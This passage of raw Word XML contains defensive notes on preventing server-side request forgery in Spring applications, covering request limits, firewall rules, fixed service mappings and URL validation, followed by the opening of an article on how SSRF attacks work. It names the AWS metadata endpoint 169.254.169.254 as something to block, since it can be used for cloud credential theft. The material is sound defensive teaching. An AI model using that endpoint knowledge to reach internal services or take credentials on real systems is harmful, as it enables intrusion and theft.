    <w:p w14:paraId="38C4FD70" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>Prefer controlled clients instead of raw RestTemplate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783B8228" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> with restrictions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFD3BE2" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Configure timeouts and limits </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EF109D" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>WebClient webClient = WebClient.builder()</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t xml:space="preserve">    .codecs(config -&gt; config.defaultCodecs().maxInMemorySize(1 * 1024 * 1024))</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t xml:space="preserve">    .build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5D23C2" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="667C4E78">
          <v:rect id="_x0000_i1151" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C31C9AE"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5. Network-Level Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D12E9F6" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>Even if code fails, infra should protect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A63C5D" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Firewall rules (block internal access) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096685E5" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Disable access to metadata endpoints: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2B47F5" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">AWS: 169.254.169.254 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40744A76" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Use VPC restrictions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48595D25" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="49DB4F06">
          <v:rect id="_x0000_i1152" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27572AD6" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. Avoid Direct User-Controlled URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561317C7" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>Instead of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3584046F" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>/fetch?url=...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AAF9AE" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E395C81" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>/fetch?service=weather</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099EA7F8" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>And map internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269E862C" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>Map&lt;String, String&gt; services = Map.of(</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t xml:space="preserve">    "weather", "https://api.weather.com/data"</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8E1EDA" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> User never controls the full URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29425502" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="7D737590">
          <v:rect id="_x0000_i1153" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C3EFF6"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7. Input Sanitization &amp; Parsing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D9A016" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Use URI, not raw strings </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DF3F3C" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Reject malformed URLs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2989D96F" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Normalize before validation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28673BBC" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="51721417">
          <v:rect id="_x0000_i1154" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6B6EEB"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Bonus: Spring Security Helps (Indirectly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038AFC20" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>Spring Security does NOT directly prevent SSRF, but helps with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F7076F" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Authentication (limit who can call APIs) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E4DC74" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Authorization (restrict sensitive endpoints) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EA31A6" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Security headers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317F692C" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="20799D16">
          <v:rect id="_x0000_i1155" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF29BD7"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Real-World Impact of SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195185A9" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>SSRF is dangerous because it can lead to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6781764A" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔑</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> Cloud credential theft (AWS metadata) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA3E32D" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> Internal service access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F1D92" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📂</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> Data leakage </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042E5D5C" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> Remote command execution (in chained attacks) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C03472" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="748C0997">
          <v:rect id="_x0000_i1156" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A8985C" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 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1"/>
        <w:gridCol w:w="3662"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w14:paraId="253B5CF2" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FE9DBEF" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F7A6D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79A760D9" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F7A6D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w14:paraId="33C4D0EB" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="716969FB" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
            <w:r w:rsidRPr="000F7A6D">
              <w:t>SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7413B99E" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
            <w:r w:rsidRPr="000F7A6D">
              <w:t>Server makes unintended requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w14:paraId="0AE872A6" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="208F9E37" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
            <w:r w:rsidRPr="000F7A6D">
              <w:t>Root Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B56B76" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
            <w:r w:rsidRPr="000F7A6D">
              <w:t>Trusting user-controlled URLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w14:paraId="757167BC" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1283098C" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
            <w:r w:rsidRPr="000F7A6D">
              <w:t>Main Fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4811FF06" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
            <w:r w:rsidRPr="000F7A6D">
              <w:t>Whitelisting + blocking internal IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w14:paraId="5FA9AF57" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA5A058" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
            <w:r w:rsidRPr="000F7A6D">
              <w:t>Spring Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F050BFC" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
            <w:r w:rsidRPr="000F7A6D">
              <w:t>Manual validation + secure design</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BB892EC" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="3B58D354">
          <v:rect id="_x0000_i1157" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E913F1" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>If you want, I can show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AEE4D6" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> Real interview questions on SSRF </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DA8E2" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> A vulnerable Spring Boot app + secure version </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77948FFC" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> Difference between SSRF vs XSS vs CSRF (very commonly asked)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0EECEA" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRDefault="000F7A6D"/>
    <w:p w14:paraId="151C9CCD" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRDefault="000F7A6D"/>
    <w:p w14:paraId="056F94F1" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRDefault="000F7A6D"/>
    <w:p w14:paraId="11BFDBDA" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRDefault="007F2C15"/>
    <w:p w14:paraId="3309AD13" w14:textId="120D3683" w:rsidR="007F2C15" w:rsidRDefault="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Server-Side Request Forgery: How to Easily Prevent Them</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="794EC35B" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server-Side Request Forgery (SSRF) attacks allow an attacker to make requests to any domains through a vulnerable server. Attackers achieve this by making the server connect back to itself, to an internal service or resource, or to its own cloud provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA97910" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Here is how SSRF attacks work: first of all, the attacker finds an application with functionality for importing data from a URL, publishing data to a URL, or otherwise reading data from a URL that can be manipulated.</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>By providing a completely different URL, or by manipulating how URLs are built, the attacker will try to modify this functionality..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49963028" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Related content: Read our guide to </w:t>
